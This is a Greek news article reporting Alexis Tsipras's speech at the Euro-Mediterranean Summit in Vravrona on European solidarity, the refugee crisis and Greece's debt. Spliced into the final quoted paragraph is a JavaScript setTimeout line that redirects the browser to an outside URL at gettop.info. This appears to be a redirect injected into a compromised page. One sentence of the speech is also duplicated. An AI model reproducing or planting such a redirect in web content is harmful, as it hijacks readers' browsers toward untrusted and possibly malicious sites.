Ο Αλ. Τσίπρας στην Ευρωμεσογειακή Σύνοδο

0
7

 

Στην ετήσια Ευρωμεσογειακή Σύνοδο, που διοργανώνεται στη Βραυρώνα, από την Ευρωπαϊκή και την Ελληνική Οικονομική και Κοινωνική Επιτροπή, απηύθυνε χαιρετισμό ο πρωθυπουργός Αλέξης Τσίπρας.

Όπως τόνισε ο πρωθυπουργός: «Η Μεσόγειος, εκτός από κοινός τόπος πολιτισμών και θρησκειών, είναι και χώρος κοινών εμπειριών.Είμαστε κοινωνίες με διακριτά χαρακτηριστικά».

«Έχουμε,συνεπώς,κοινό ενδιαφέρον & συμφέρον να συνεργαστούμε για να προωθήσουμε κοινές πρωτοβουλίες και προτεραιότητες σε ευρωπαϊκό επίπεδο.Αυτήν την περίοδο δε κρίνεται απλά η έκβαση μιας κρίσης -είτε της οικονομικής είτε της προσφυγικής- αλλά η ίδια η συνοχή της Ευρώπης».

Και συμπλήρωσε: «Και κρίνεται από την ικανότητά της να αντιμετωπίσει με αλληλεγγύη και αποτελεσματικότητα όλες τις παράλληλες κρίσεις της. Την οικονομική, την προσφυγική και την κρίση εξωτερικής και εσωτερικής ασφάλειας. Την οικονομική, την προσφυγική και την κρίση εξωτερικής και εσωτερικής ασφάλειας. Η αρχή της αλληλεγγύης είναι ο θεμέλιος λίθος της ενωμένης Ευρώπης. Χωρίς αυτήν υπνοβατούμε προς τη «σκοτεινή Ευρώπη» του 20ου αιώνα. Η χώρα μας δεν τηρεί τις υποχρεώσεις της μόνο στο προσφυγικό. Τηρούμε και τη συμφωνία που έχουμε υπογράψει από τον Ιούλιο του 2015».

Όπως υπογράμμισε ο Αλέξης Τσίπρας: «Η ίδια απόφαση του Eurogroup προσδιορίζει όχι μόνο τις υποχρεώσεις της Ελλάδας αλλά και τις υποχρέωση των πιστωτών απέναντι στην Ελλάδα. Τώρα, που μπαίνουμε με σταθερά βήματα στο στάδιο της ανάπτυξης, οι πιστωτές μας οφείλουν να τηρήσουν τις δεσμεύσεις τους για το το χρέος». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here